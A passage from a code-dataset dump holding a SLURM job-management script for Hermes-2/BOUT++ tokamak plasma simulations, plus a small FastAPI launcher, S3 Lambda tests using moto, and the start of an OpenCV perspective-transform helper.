find_line('{}/0/{}'.format(\n self.runDir, self.inpFile),\n param)\n else:\n lineNum = lineNum\n for i in range(self.scanNum):\n os.chdir('{}/{}'.format(self.runDir, i))\n replace_line('{}'.format(self.inpFile),\n lineNum,\n '{} = {}'.format(param, value))\n\n def modJob(self, nProcs, hermesVer, tme, optNodes=True):\n self.log('nProcs: {}'.format(nProcs))\n self.log('hermesVer: {}'.format(hermesVer))\n self.log('simTime: {}'.format(tme))\n if optNodes is True:\n nodes = int(np.ceil(nProcs/40))\n for i in range(self.scanNum):\n os.chdir('{}/{}'.format(self.runDir, i))\n replace_line('{}.job'.format(self.title),\n find_line('{}.job'.format(self.title),\n '--nodes'),\n '#SBATCH --nodes={}'.format(nodes))\n for i in range(self.scanNum):\n os.chdir('{}/{}'.format(self.runDir, i))\n # os.system('cp {}/test.job {}.job'.format(\n # self.pathOut, self.title))\n replace_line('{}.job'.format(self.title),\n find_line('{}.job'.format(self.title),\n '--ntasks'),\n '#SBATCH --ntasks={}'.format(nProcs))\n replace_line('{}.job'.format(self.title),\n find_line('{}.job'.format(self.title),\n 'mpiexec'),\n 'mpiexec -n {} {} -d {}/{}'.format(nProcs,\n hermesVer,\n self.runDir,\n i))\n replace_line('{}.job'.format(self.title),\n find_line('{}.job'.format(self.title),\n '--job-name'),\n '#SBATCH --job-name={}-{}'.format(self.title, i))\n replace_line('{}.job'.format(self.title),\n find_line('{}.job'.format(self.title),\n '--time'),\n '#SBATCH --time={}'.format(tme))\n\n def setup(self):\n os.mkdir('{}'.format(self.runDir))\n os.chdir('{}'.format(self.runDir))\n self.log = logSim(self.runDir, 'log.txt')\n self.log('title: {}'.format(self.title))\n self.log('inpFile: {}'.format(self.inpFile))\n self.log('gridFile: {}'.format(str(self.gridFile)))\n self.log('scanParams: {}'.format(str(self.scanParams)))\n for i in range(self.scanNum):\n os.mkdir(str(i))\n os.system('cp {}/{} {}/BOUT.inp'.format(self.pathOut,\n self.inpFile, i))\n os.system('cp {}/{} {}/{}.job'.format(\n self.pathOut, 'test.job', i, self.title))\n if type(self.gridFile) == str:\n os.system('cp /users/hm1234/scratch/gridfiles/{} {}'.format(\n self.gridFile, i))\n self.inpFile = 'BOUT.inp'\n if self.gridFile is not None:\n self.modInp2('grid', self.gridFile)\n\n def subJob(self, shortQ=False):\n for i in range(self.scanNum):\n os.chdir('{}/{}'.format(self.runDir, i))\n if shortQ is False:\n os.system('sbatch {}.job'.format(self.title))\n elif shortQ is True:\n os.system('sbatch -q short {}.job'.format(self.title))\n\n\nclass slabSim(startSim):\n pass\n # def __init__(self, pathOut, pathIn, dateDir, inpFile,\n # gridFile=None, scanParams=None, title='sim'):\n # super().__init__(pathOut, pathIn, dateDir, inpFile, None,\n # scanParams=None, title='sim')\n\n # def setup(self):\n # os.mkdir('{}'.format(self.runDir))\n # os.chdir('{}'.format(self.runDir))\n # self.log = logSim(self.runDir, 'log.txt')\n # self.log('title: {}'.format(self.title))\n # self.log('inpFile: {}'.format(self.inpFile))\n # self.log('gridFile: {}'.format(str(self.gridFile)))\n # self.log('scanParams: {}'.format(str(self.scanParams)))\n # for i in range(self.scanNum):\n # os.mkdir(str(i))\n # os.system('cp {}/{} {}/BOUT.inp'.format(self.pathOut,\n # self.inpFile, i))\n # self.inpFile = 'BOUT.inp'\n\n\nclass multiGridSim(startSim):\n def __init__(self, pathOut, pathIn, dateDir, inpFile,\n scanParams, title='sim'):\n super().__init__(pathOut, pathIn, dateDir, inpFile, 'blah',\n scanParams, title)\n self.gridFile = self.scanParams\n\n def setup(self):\n super().setup()\n for i in range(self.scanNum):\n os.system('cp /users/hm1234/scratch/gridfiles/{} {}/{}'.format(\n self.pathOut, self.scanParams[i], self.runDir, i))\n self.modInp1('grid')\n\n\nclass addSim:\n def __init__(self, runDir, scanIDs=[], logFile='log.txt'):\n self.runDir = runDir\n os.chdir(runDir)\n self.scanParams = read_line(logFile, 'scanParams')\n if len(scanIDs) == 0:\n if self.scanParams is not None:\n self.scanIDs = list(np.arange(len(self.scanParams)))\n else:\n self.scanIDs = [0]\n else:\n self.scanIDs = scanIDs\n if self.scanParams is not None:\n self.scanNum = len(self.scanParams)\n else:\n self.scanNum = 1\n self.title = read_line(logFile, 'title')\n # self.inpFile = read_line(logFile, 'inpFile')\n self.inpFile = 'BOUT.inp'\n self.gridFile = read_line(logFile, 'gridFile')\n self.hermesVer = read_line(logFile, 'hermesVer')\n self.nProcs = read_line(logFile, 'nProcs')\n\n def copyNewInp(self, oldDir, inpName):\n for i in self.scanIDs:\n os.system('cp {}/{} {}/{}/{}/BOUT.inp'.format(\n oldDir, inpName, self.runDir, i, self.addType))\n\n def modInp(self, param, lineNum=None):\n scanParams = []\n for i in self.scanIDs:\n scanParams.append(self.scanParams[i])\n for i in self.scanIDs:\n os.chdir('{}/{}/{}'.format(self.runDir, i, self.addType))\n if lineNum is None:\n lineNum = find_line('{}/{}/{}/{}'.format(\n self.runDir, i, self.addType, self.inpFile),\n param)\n else:\n lineNum = lineNum\n for j in scanParams:\n replace_line('{}'.format(self.inpFile),\n lineNum,\n '{} = {}'.format(param, j))\n\n def copyInpFiles(self, oldDir=None, addType='restart'):\n self.addType = addType\n for i in self.scanIDs:\n os.chdir('{}/{}'.format(self.runDir, i))\n os.system('mkdir -p {}'.format(addType))\n # print(os.system('pwd'))\n # os.system('cp {}/{}/{}/BOUT.inp {}'.format(self.runDir, i,\n # oldDir, addType))\n if type(self.gridFile) == list:\n os.system('cp {} {}'.format(self.gridFile[i], addType))\n elif self.gridFile is None:\n pass\n else:\n os.system('cp {} {}'.format(self.gridFile, addType))\n os.system('cp *.job {}/{}.job'.format(addType, addType))\n if oldDir is None:\n cmd = 'cp {} {}'.format(self.inpFile, addType)\n else:\n cmd = 'cp {}/{} {}'.format(oldDir, self.inpFile, addType)\n os.system(cmd)\n\n def copyRestartFiles(self, oldDir=None, addType='restart', t=None):\n if t is None:\n if oldDir is None:\n cmd = 'cp BOUT.restart.* {}'.format(addType)\n else:\n cmd = 'cp {}/BOUT.restart.* {}'.format(oldDir, addType)\n for i in self.scanIDs:\n os.chdir('{}/{}'.format(self.runDir, i))\n os.system(cmd)\n else:\n for i in self.scanIDs:\n if oldDir is None:\n os.chdir('{}/{}'.format(self.runDir, i))\n else:\n os.chdir('{}/{}/{}'.format(\n self.runDir, i, oldDir))\n create(final=t, path=\"./\", output='{}/{}/{}'.format(\n self.runDir, i, addType))\n\n def redistributeProcs(self, oldDir, addType, npes):\n self.copyInpFiles(oldDir, addType)\n for i in self.scanIDs:\n os.chdir('{}/{}'.format(self.runDir, i))\n redistribute(npes=npes, path=oldDir, output=addType)\n self.nProcs = npes\n\n def modFile(self, param, value, lineNum=None):\n for i in self.scanIDs:\n if lineNum is None:\n lineNum = find_line('{}/{}/{}/{}'.format(\n self.runDir, i, self.addType, self.inpFile),\n param)\n else:\n lineNum = lineNum\n os.chdir('{}/{}/{}'.format(self.runDir, i, self.addType))\n replace_line('{}'.format(self.inpFile),\n lineNum,\n '{} = {}'.format(param, value))\n\n def modJob(self, tme, nProcs=None, optNodes=True):\n if nProcs is None:\n nProcs = self.nProcs\n if optNodes is True:\n nodes = int(np.ceil(nProcs/40))\n for i in self.scanIDs:\n os.chdir('{}/{}/{}'.format(self.runDir, i, self.addType))\n replace_line('{}.job'.format(self.addType),\n find_line('{}.job'.format(self.addType),\n '--nodes'),\n '#SBATCH --nodes={}'.format(nodes))\n for i in self.scanIDs:\n os.chdir('{}/{}/{}'.format(self.runDir, i, self.addType))\n replace_line('{}.job'.format(self.addType),\n find_line('{}.job'.format(self.addType),\n '--ntasks'),\n '#SBATCH --ntasks={}'.format(nProcs))\n replace_line('{}.job'.format(self.addType),\n find_line('{}.job'.format(self.addType),\n 'mpiexec'),\n 'mpiexec -n {} {} -d {}/{}/{} restart'.format(\n nProcs, self.hermesVer, self.runDir,\n i, self.addType))\n replace_line('{}.job'.format(self.addType),\n find_line('{}.job'.format(self.addType),\n '--job-name'),\n '#SBATCH --job-name={}-{}'.format(self.addType, i))\n replace_line('{}.job'.format(self.addType),\n find_line('{}.job'.format(self.addType),\n '--time'),\n '#SBATCH --time={}'.format(tme))\n replace_line('{}.job'.format(self.addType),\n find_line('{}.job'.format(self.addType),\n '--mem'),\n '#SBATCH --mem={}'.format('8gb'))\n\n def subJob(self, shortQ=False):\n for i in self.scanIDs:\n os.chdir('{}/{}/{}'.format(self.runDir, i, self.addType))\n if shortQ is False:\n os.system('sbatch {}.job'.format(self.addType))\n elif shortQ is True:\n os.system('sbatch -q short {}.job'.format(self.addType))\n\n\nclass addNeutrals(addSim):\n def addVar(self, Nn=0.1, Pn=0.05):\n for i in self.scanIDs:\n os.chdir('{}/{}/{}'.format(self.runDir, i, self.addType))\n addvar('Nn', Nn)\n addvar('Pn', Pn)\n\n\nclass addCurrents(addSim):\n pass\n\n\nclass restartSim(addSim):\n pass\n\n\nclass addTurbulence(addSim):\n '''\n make sure to use\n export\n PYTHONPATH=/mnt/lustre/groups/phys-bout-2019/BOUT-dev/tools/pylib/:$PYTHONPATH\n '''\n def addTurb(self, oldDir, addType, npes=None, MZ=64,\n param='Vort', pScale=1e-5, multiply=True):\n if npes is not None:\n tempDir = 'temp-turb'\n self.redistributeProcs(npes=npes, oldDir=oldDir, addType=tempDir)\n oldDir = tempDir\n self.copyInpFiles(oldDir, addType)\n for i in self.scanIDs:\n os.chdir('{}/{}'.format(self.runDir, i))\n resizeZ(newNz=MZ, path=oldDir, output=addType)\n addnoise(path=addType, var=param, scale=pScale)\n self.modFile('nz', MZ)\n if npes is not None:\n for i in self.scanIDs:\n os.chdir('{}/{}'.format(self.runDir, i))\n os.system('rm -rf {}'.format(tempDir))\n\n\nif __name__ == \"__main__\":\n inpFile = 'BOUT.inp'\n gridFile = 'tcv_52068_64x64_profiles_1e19.nc'\n gridFile = 'tcv_63127_64x64_profiles_1.2e19.nc'\n\n pathOut = '/users/hm1234/scratch/newTCV2'\n pathIn = 'gridscan2'\n pathIn = 'gridscan'\n pathIn = 'init'\n pathIn = 'gridscan3'\n pathIn = 'hdscan'\n # pathIn = 'high_recycle'\n # pathIn = 'high_density'\n dateDir = datetime.datetime.now().strftime(\"%d-%m-%y_%H%M%S\")\n # dateDir = '_turbTest'\n\n # title = 'cfrac'\n # scanParams = [0.01, 0.02, 0.03, 0.05, 0.07]\n\n title = 'rfrac'\n scanParams = [0.9, 0.93, 0.96, 0.99]\n # scanParams = [0.95]\n\n nProcs = 234\n tme = '00:19:19' # day-hr:min:sec\n # tme = '10:10:00'\n # hermesVer = '/users/hm1234/scratch/BOUT-test4/hermes-2/hermes-2'\n # hermesVer = '/mnt/lustre/groups/phys-bout-2019/hermes-2-next/hermes-2'\n # hermesVer = '/users/hm1234/scratch/BOUT25Jun19/hermes-2/hermes-2'\n hermesVer = '/users/hm1234/scratch/BOUT5Jul19/hermes-2/hermes-2'\n hermesVer = '/users/hm1234/scratch/BOUT18Sep19/hermes-2/hermes-2'\n hermesVer = '/users/hm1234/scratch/BOUT28Oct19/hermes-2/hermes-2'\n hermesVer = '/users/hm1234/scratch/BOUT21Nov19/hermes-2v2/hermes-2'\n hermesVer = '/users/hm1234/scratch/BOUT21Nov19/test/hermes-2/hermes-2'\n\n title = 'grid'\n\n grids = ['tcv_63127_256x64_profiles_2e19.nc',\n 'tcv_63127_256x64_profiles_4e19.nc',\n 'tcv_63127_256x64_profiles_6e19.nc',\n 'tcv_63127_256x64_profiles_8e19.nc']\n # 'tcv_63127_256x64_profiles_10e19.nc']\n # grids = ['tcv_63161_64x64_profiles_1e19.nc',\n # 'tcv_63161_64x64_profiles_2e19.nc',\n # 'tcv_63161_64x64_profiles_3e19.nc',\n # 'tcv_63161_64x64_profiles_3.25e19.nc',\n # 'tcv_63161_64x64_profiles_3.5e19.nc',\n # 'tcv_63161_64x64_profiles_3.75e19.nc',\n # 'tcv_63161_64x64_profiles_4.5e19.nc',\n # 'tcv_63161_64x64_profiles_5.5e19.nc']\n # grids = ['tcv_63161_64x64_profiles_6e19.nc',\n # 'tcv_63161_64x64_profiles_6.5e19.nc',\n # 'tcv_63161_64x64_profiles_7e19.nc',\n # 'tcv_63161_64x64_profiles_7.5e19.nc',\n # 'tcv_63161_64x64_profiles_8.2e19.nc']\n # gridFile = 'tcv_63127_64x64_profiles_1.6e19.nc'\n\n # grids = ['newtcv_63127_64x64_profiles_22e19.nc',\n # 'newtcv_63161_64x64_profiles_22e19.nc']\n\n # grids = ['tcv_63161_64x64_profiles_8.9e19.nc',\n # 'tcv_63161_64x64_profiles_9.6e19.nc',\n # 'tcv_63161_64x64_profiles_10.2e19.nc',\n # 'tcv_63161_64x64_profiles_11e19.nc',\n # 'tcv_63161_64x64_profiles_12e19.nc']\n\n # grids = ['tcv_63127_64x64_profiles_9.9e19.nc',\n # 'tcv_63127_64x64_profiles_10.5e19.nc',\n # 'tcv_63127_64x64_profiles_11e19.nc',\n # 'tcv_63127_64x64_profiles_12e19.nc',\n # 'tcv_63127_64x64_profiles_13e19.nc']\n\n title = 'gauss'\n tme = '23:59:59'\n # tme = '00:19:59'\n nProcs = 512\n hermesVer = '/users/hm1234/scratch/hermes2/9Jan20/hermes-2'\n\n slabSim = slabSim('/users/hm1234/scratch/slabTCV', '2020runs',\n dateDir, 'BOUT5.inp', title=title)\n slabSim.setup()\n slabSim.modInp2('NOUT', 222)\n slabSim.modInp2('TIMESTEP', 111)\n slabSim.modInp2('ion_viscosity', 'false')\n slabSim.modInp2('hyper', 0.5, 148)\n # power of 3 still fast using fft but maybe more\n # robust to triangular instabilities)\n # slabSim.modInp2('nz', 243)\n # slabSim.modInp2('ny', 32, lineNum=18)\n # slabSim.modInp2('ramp_j_diamag', 1.0)\n slabSim.modJob(nProcs, hermesVer, tme)\n slabSim.subJob(shortQ=False)\n\n tme = '23:59:59'\n # runDir = '/users/hm1234/scratch/slabTCV/2020runs/slab-17-01-20_104716'\n runDir = '/users/hm1234/scratch/slabTCV/2020runs/gauss-24-01-20_155235'\n runDir = '/users/hm1234/scratch/slabTCV/2020runs/gauss-10-02-20_100102'\n runDir = '/users/hm1234/scratch/slabTCV/2020runs/gauss-14-02-20_153923'\n # res = restartSim(runDir,)\n # old = None\n # new = '2-hyper'\n # res.copyInpFiles(old, new)\n # res.copyRestartFiles(old, new, t=-10)\n # # res.modFile('output_ddt', 'true')\n # # res.modFile('NOUT', 200)\n # # res.modFile('TIMESTEP', 50)\n # # res.modFile('ion_viscosity', 'false')\n # res.modFile('ramp_j_diamag', 1.0)\n # res.modFile('hyper', 0.1, 148)\n # res.modJob(tme)\n # res.subJob()\n\n # runDir = '/users/hm1234/scratch/slabTCV/2020runs/sim-13-01-20_112202'\n # tme = '12:12:12'\n # addN = addNeutrals(runDir)\n # addType = '2-addN'\n # addN.copyInpFiles(addType=addType)\n # addN.copyRestartFiles(addType=addType)\n # # addN.copyNewInp(oldDir='/users/hm1234/scratch/newTCV',\n # # inpName='BOUT-2Dworks.inp')\n # addN.modFile('NOUT', 100)\n # addN.modFile('TIMESTEP', 2)\n # # addN.modFile('neutral_friction', 'true')\n # addN.modFile('type', 'mixed', lineNum=241)\n # addN.modJob(tme, optNodes=True)\n # addN.addVar(Nn=0.04, Pn=0.02)\n # addN.subJob()\n\n # grids = ['tcv_63127_64x64_profiles_1.6e19.nc',\n # 'tcv_63127_64x64_profiles_4.0e19.nc']\n\n grids = ['tcv_63161_128x64_profiles_1e19.nc',\n 'tcv_63161_128x64_profiles_2e19.nc',\n 'tcv_63161_128x64_profiles_3e19.nc',\n 'tcv_63161_128x64_profiles_4e19.nc',\n 'tcv_63161_128x64_profiles_5e19.nc',\n 'tcv_63161_128x64_profiles_6e19.nc',\n 'tcv_63161_128x64_profiles_7e19.nc',\n 'tcv_63161_128x64_profiles_8e19.nc',\n 'tcv_63161_128x64_profiles_9e19.nc',\n 'tcv_63161_128x64_profiles_10e19.nc']\n\n grids = ['tcv_63161_128x64_profiles_1e19.nc',\n 'tcv_63161_128x64_profiles_5e19.nc',\n 'tcv_63161_128x64_profiles_9e19.nc']\n\n grids = ['tcv_63161_extendedpsi_64x64_profiles_1e19.nc',\n 'tcv_63161_extendedpsi_64x64_profiles_3e19.nc',\n 'tcv_63161_extendedpsi_64x64_profiles_5e19.nc']\n\n # qgrids = ['tcv_63161_128x64_profiles_1e19.nc']\n\n # inpFile = 'BOUT2.inp'\n # title = 'expsi'\n # nProcs = 256\n # tme = '06:66:66'\n # gridSim = multiGridSim(pathOut, pathIn, dateDir, inpFile, grids, title)\n # gridSim.setup()\n # gridSim.modInp2('carbon_fraction', 0.04)\n # gridSim.modInp2('frecycle', 0.99)\n # gridSim.modInp2('NOUT', 444)\n # gridSim.modInp2('TIMESTEP', 222)\n # gridSim.modJob(nProcs, hermesVer, tme)\n # gridSim.subJob()\n\n # pathOut = '/users/hm1234/scratch/slabTCV/'\n # pathIn = 'test'\n # inpFile = 'BOUT2.inp'\n # nProcs = 192\n # tme = '00:11:11'\n # title = 'slab'\n # scanParams = [0.0]\n # sim1 = slabSim(pathOut, pathIn, dateDir, inpFile, scanParams, title)\n # sim1.setup()\n # sim1.modInp1('carbon_fraction')\n # # sim1.modInp2('carbon_fraction', 0.95)\n # # sim1.modInp2('ion_viscosity', 'true')\n # sim1.modInp2('NOUT', 444)\n # sim1.modInp2('TIMESTEP', 222)\n # # sim1.modInp2('carbon_fraction', 0.04)\n # sim1.modJob(nProcs, hermesVer, tme)\n # sim1.subJob(shortQ=True)\n\n # runDir = '/users/hm1234/scratch/TCV/NeScan2/NeScan-03-06-19_171145'\n # runDir = '/users/hm1234/scratch/TCV/NeScan2/frecycle-05-06-19_145457'\n # runDir = '/users/hm1234/scratch/TCV/longtime/cfrac-10-06-19_175728'\n # runDir = '/users/hm1234/scratch/TCV/longtime/rfrac-19-06-19_102728'\n # runDir = '/users/hm1234/scratch/TCV2/gridscan/grid-20-06-19_135947'\n # runDir = '/users/hm1234/scratch/newTCV/gridscan/grid-01-07-19_185351'\n # runDir = '/users/hm1234/scratch/newTCV/gridscan/test'\n runDir = '/users/hm1234/scratch/newTCV/turb-test/g-18-07-19_133047'\n runDir = '/users/hm1234/scratch/newTCV/scans/cfrac-23-07-19_163139'\n runDir = '/users/hm1234/scratch/newTCV/scans/rfrac-25-07-19_162302'\n runDir = '/users/hm1234/scratch/newTCV/gridscan/grid-07-09-19_180613'\n runDir = '/users/hm1234/scratch/newTCV/gridscan/grid-12-09-19_165234'\n # runDir = '/users/hm1234/scratch/newTCV/gridscan2/grid-13-09-19_153544'\n # runDir = '/users/hm1234/scratch/newTCV/gridscan2/grid-18-09-19_111405'\n runDir = '/users/hm1234/scratch/newTCV/gridscan2/grid-23-09-19_140426'\n # runDir = '/users/hm1234/scratch/newTCV/high_recycle/grid-25-09-19_165128'\n # runDir = '/users/hm1234/scratch/newTCV/high_density/grid-28-10-19_133357'\n # runDir = '/users/hm1234/scratch/newTCV/gridscan2/grid-07-11-19_154854'\n runDir = '/users/hm1234/scratch/newTCV/gridscan/grid-07-11-19_155631'\n runDir = '/users/hm1234/scratch/slabTCV/init/slab-25-11-19_143529'\n runDir = '/users/hm1234/scratch/newTCV2/hdscan/hdg-02-12-19_172620'\n runDir = '/users/hm1234/scratch/newTCV2/hdscan/expsi-04-12-19_203752'\n\n # tme = '06:66:33'\n # addN = addNeutrals(runDir)\n # addType = '2-addN'\n # addN.copyInpFiles(addType=addType)\n # addN.copyRestartFiles(addType=addType)\n # # addN.copyNewInp(oldDir='/users/hm1234/scratch/newTCV',\n # # inpName='BOUT-2Dworks.inp')\n # addN.modFile('NOUT', 555)\n # addN.modFile('TIMESTEP', 150)\n # # addN.modFile('neutral_friction', 'true')\n # addN.modFile('type', 'mixed', lineNum=229)\n # addN.modJob(tme)\n # addN.addVar(Nn=0.04, Pn=0.02)\n # addN.subJob()\n\n # tme = '06:66:66'\n # res = restartSim(runDir, scanIDs=[0])\n # old = '2-addN'\n # new = '2.2-addN'\n # res.copyInpFiles(old, new)\n # res.copyRestartFiles(old, new)\n # # res.modFile('adapt_source', 'false')\n # res.modJob(tme)\n # res.subJob()\n\n # res = restartSim(runDir, scanIDs=[0])\n # old = '2.1-resN'\n # new = '2.2-modSolver'\n # res.copyInpFiles(old, new)\n # res.copyRestartFiles(old, new)\n # # res.modFile('use_precon', 'false')\n # res.modFile('maxl', '5')\n # res.modJob(tme)\n # res.subJob()\n\n # tme = '23:59:59'\n # addN = addNeutrals(runDir)\n # addType = '2-addN2'\n # addN.copyInpFiles(addType=addType)\n # addN.copyRestartFiles(addType=addType)\n # # addN.copyNewInp(oldDir='/users/hm1234/scratch/newTCV',\n # # inpName='BOUT-2Dworks.inp')\n # addN.modFile('NOUT', 555)\n # addN.modFile('TIMESTEP', 150)\n # # addN.modFile('neutral_friction', 'true')\n # addN.modFile('type', 'mixed', lineNum=214)\n # addN.modFile('split_n0 ', 'true')\n # addN.modFile('split_n0_psi', 'true')\n # addN.modJob(tme)\n # addN.addVar(Nn=0.04, Pn=0.02)\n # addN.subJob()\n\n # tme = '1-23:59:59'\n # old = '2-addN'\n # new = '3.1-addC'\n # addC = addCurrents(runDir)\n # addC.copyInpFiles(old, new)\n # addC.copyRestartFiles(old, new)\n # addC.modFile('j_par', 'true')\n # addC.modFile('j_diamag', 'true')\n # # addC.modFile('split_n0 ', 'false')\n # # addC.modFile('split_n0_psi', 'false')\n # # addC.modFile('adapt_source', 'false')\n # addC.modFile('NOUT', 444) # 600\n # addC.modFile('TIMESTEP', 2) # 333\n # addC.modJob(tme, optNodes=True)\n # addC.subJob()\n\n # tme = '1-23:59:59'\n # old = '3-addC'\n # new = '4-addT'\n # addT = addTurbulence(runDir, scanIDs=[0])\n # newProcs = 512\n # addT.addTurb(old, new, npes=newProcs, MZ=256)\n # # addT.modFile('nz', 256)\n # addT.modFile('NOUT', 222)\n # addT.modFile('TIMESTEP', 5)\n # addT.modJob(tme=tme, nProcs=newProcs, optNodes=True)\n # addT.subJob()\n\n # tme = '1-23:59:59'\n # old = '3-addC'\n # new = '3.1-modPI'\n # addC = addCurrents(runDir, scanIDs=[0,1,2])\n # addC.copyInpFiles(old, new)\n # addC.copyRestartFiles(old, new)\n # addC.modFile('source_p', 1e-1)\n # addC.modFile('source_i', 1e-4)\n # # addC.modFile('split_n0 ', 'false')\n # # addC.modFile('split_n0_psi', 'false')\n # # addC.modFile('adapt_source', 'false')\n # # addC.modFile('NOUT', 500) # 600\n # # addC.modFile('TIMESTEP', 500) # 333\n # addC.modJob(tme)\n # addC.subJob()\n\n # addC = addCurrents(runDir)\n # addC.copyInpFiles(addType='2-addC')\n # addC.copyRestartFiles(addType='2-addC')\n # addC.modFile('j_par', 'true')\n # addC.modFile('j_diamag', 'true')\n # addC.modFile('TIMESTEP', 333)\n # addC.modJob(tme)\n # addC.subJob()\n\n # tme = '1-23:59:59'\n # old = '3-addC'\n # new = '3-resC'\n # resC = addCurrents(runDir)\n # resC.copyInpFiles(old, new)\n # resC.copyRestartFiles(old, new)\n # # addC.modFile('psi_')\n # resC.modFile('NOUT', 666)\n # resC.modFile('TIMESTEP', 444)\n # resC.modJob(tme)\n # resC.subJob()\n\n # tme = '1-23:59:59'\n # old = '3-resC3'\n # new = '4-addD'\n # addD = addCurrents(runDir)\n # addD.copyInpFiles(old, new)\n # addD.copyRestartFiles(old, new)\n # # addC.modFile('psi_')\n # addD.modFile('NOUT', 666)\n # addD.modFile('TIMESTEP', 444)\n # addD.modFile('pctype', 'hypre')\n # addD.modFile('neutral_gamma', 0.3, lineNum=218)\n # addD.modJob(tme)\n # addD.subJob()\n\n # tme = '1-23:59:59'\n # old = '3-addC2'\n # new = '4-split'\n # addC = addCurrents(runDir)\n # addC.copyInpFiles(old, new)\n # addC.copyRestartFiles(old, new)\n # addC.modFile('j_par', 'true')\n # addC.modFile('j_diamag', 'true')\n # addC.modFile('split_n0 ', 'true')\n # addC.modFile('split_n0_psi', 'true')\n # # addC.modFile('psi_')\n # addC.modFile('NOUT', 555)\n # addC.modFile('TIMESTEP', 55)\n # addC.modJob(tme)\n # addC.subJob()\n\n # tme = '23:55:55'\n # # addT = testTurbulence(runDir)\n # # addT.copyFiles2('3-addC', '4-addT')\n # # addT.modJob(tme)\n # addT = addTurbulence(runDir, scanIDs=[3])\n # addT.hermesVer = hermesVer\n # # addT.redistributeProcs('3-addC', '4-redistribute', 480)\n # # addT.addTurb('4-redistribute', '5-addT')\n # addT.addTurb('3-addC', '5-addT')\n # # addT.copyInpFiles('3-addC', '5-addT')\n # addT.copyNewInp(runDir, 'BOUT2.inp')\n # addT.modInp('grid')\n # addT.modFile('TIMESTEP', 0.002)\n # addT.modJob(tme)\n # addT.subJob()\n\n # addT = addTurbulence(runDir)\n # addT.copyInpFiles('3-addC', '4-addT')\n # addT.addTurb('3-addC', '4-addT')\n # addT.modJob(tme)\n # addT.modFile('MZ', 64)\n # addT.modFile('NOUT', 333)\n # addT.modFile('TIMESTEP', 0.04)\n # addT.modFile('output_ddt', 'true')\n # addT.modFile('verbose', 'true')\n # addT.subJob()\n","repo_name":"hahahasan/hermes-sim-tools","sub_path":"runJobs.py","file_name":"runJobs.py","file_ext":"py","file_size_in_byte":30601,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"13142372455","text":"import uvicorn\nfrom app.main import app\n\n\ndef prepare_host_structure(filename_uuid):\n filename_location = Path.cwd().joinpath('output', filename_uuid)\n input_location = Path.cwd().joinpath('input', filename_uuid)\n if not filename_location.is_dir():\n filename_location.mkdir(parents=True)\n if not input_location.is_dir():\n input_location.mkdir(parents=True)\n return\n\n\nif __name__ == '__main__':\n import sys\n\n if len(sys.argv) > 1:\n from pathlib import Path\n from uuid import uuid4\n from app.app_settings import UPLOAD_FOLDER\n from app.core.mapping_gen.mapping import start_mapping\n\n sourcefile = Path.cwd().joinpath(UPLOAD_FOLDER, sys.argv[1])\n targetfile = Path.cwd().joinpath(UPLOAD_FOLDER, sys.argv[2])\n filename_uuid: str = str(uuid4()).split('-')[0]\n prepare_host_structure(filename_uuid)\n\n status = start_mapping(sourcefile, targetfile, filename_uuid)\n print(status)\n else:\n uvicorn.run(app, host='127.0.0.1', port=5050, debug=True)\n","repo_name":"alexander-nemirovskiy/s2r_mapping_ui","sub_path":"s2r_mappings.py","file_name":"s2r_mappings.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13593305227","text":"from moto import mock_s3\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nfrom lambda2_data import lambda_handler\nimport boto3\n\n\n@mock_s3\ndef test_lambda_handler():\n s3 = boto3.resource('s3', region_name='us-east-1')\n s3.create_bucket(Bucket='landing-casas-09')\n s3.create_bucket(Bucket='casas-final-09')\n\n test_html = \"\"\"\n \n \n

    \n
    Barrio 1
    \n
    $200,000
    \n 3\n 2\n
    100 mts2
    \n
    \n
    \n
    Barrio 2
    \n
    $300,000
    \n 4\n 3\n
    200 mts2
    \n
    \n \n \n \"\"\"\n\n test_date = datetime.today().strftime('%Y-%m-%d')\n test_key = f'{test_date}.html'\n\n s3.Object('landing-casas-09', test_key).put(Body=test_html)\n\n response = lambda_handler(None, None)\n\n test_csv_key = f'{test_date}.csv'\n\n assert s3.Bucket('casas-final-09').Object(test_csv_key).get()['Body'].read().decode() == f\"FechaDescarga, Barrio, Valor, NumHabitaciones, NumBanos, mts2\\n{test_date}, Barrio 1, $200,000, 3, 2, inf\\n{test_date}, Barrio 2, $300,000, 3, inf, inf\\n\"\n assert response['statusCode'] == 200\n assert response['body'] == 'Archivo CSV generado con éxito.'\n\n\ndef test_lambda_handler_s3():\n s3 = boto3.client('s3')\n date = datetime.today().strftime('%Y-%m-%d')\n key = f'{str(date)}.html'\n obj = s3.get_object(Bucket='landing-casas-09', Key=key)\n body = obj['Body'].read()\n assert body is not None\n\n\ndef test_lambda_handler_soup():\n s3 = boto3.client('s3')\n date = datetime.today().strftime('%Y-%m-%d')\n key = f'{str(date)}.html'\n obj = s3.get_object(Bucket='landing-casas-09', Key=key)\n body = obj['Body'].read()\n soup = BeautifulSoup(body, 'html.parser')\n assert soup is not None\n","repo_name":"JuanCRodriguez20/ParcialBD","sub_path":"lambda2/test_lambda2_data.py","file_name":"test_lambda2_data.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71892635639","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nkLeftBottomGap = 120\nkLeftTopGap = 600\nkTopGap = 200\nresolution = [1280, 720]\noutputSize = [300, 600]\nleftTop = [kLeftTopGap,kTopGap]\nrightTop = [resolution[0]-kLeftTopGap,kTopGap]\nleftBottom = [kLeftBottomGap,resolution[1]]\nrightBottom = [resolution[0]-kLeftBottomGap,resolution[1]]\n\ndef changePerspective(img, draw=0):\n # LT, RT, LB, RB\n pts = [leftTop,rightTop,leftBottom,rightBottom]\n # pts = [[345,220],[468,220],[0,420],[750,420]] #Hardcoded values for our usecase\n if draw == 1:\n for point in pts:\n img = cv2.circle(img, point, 5, (0,255,0), -1)\n\n pts1 = np.float32(pts)\n pts2 = np.float32([[0,0],[outputSize[0],0],[0,outputSize[1]],[outputSize[0],outputSize[1]]])\n M = cv2.getPerspectiveTransform(pts1,pts2)\n dst = cv2.warpPerspective(img,M,outputSize)\n\n colour = (0, 255, 0)\n thickness = 3\n img = cv2.line(img, leftBottom, leftTop, colour, thickness)\n img = cv2.line(img, rightBottom, rightTop, colour, thickness)\n\n return img, 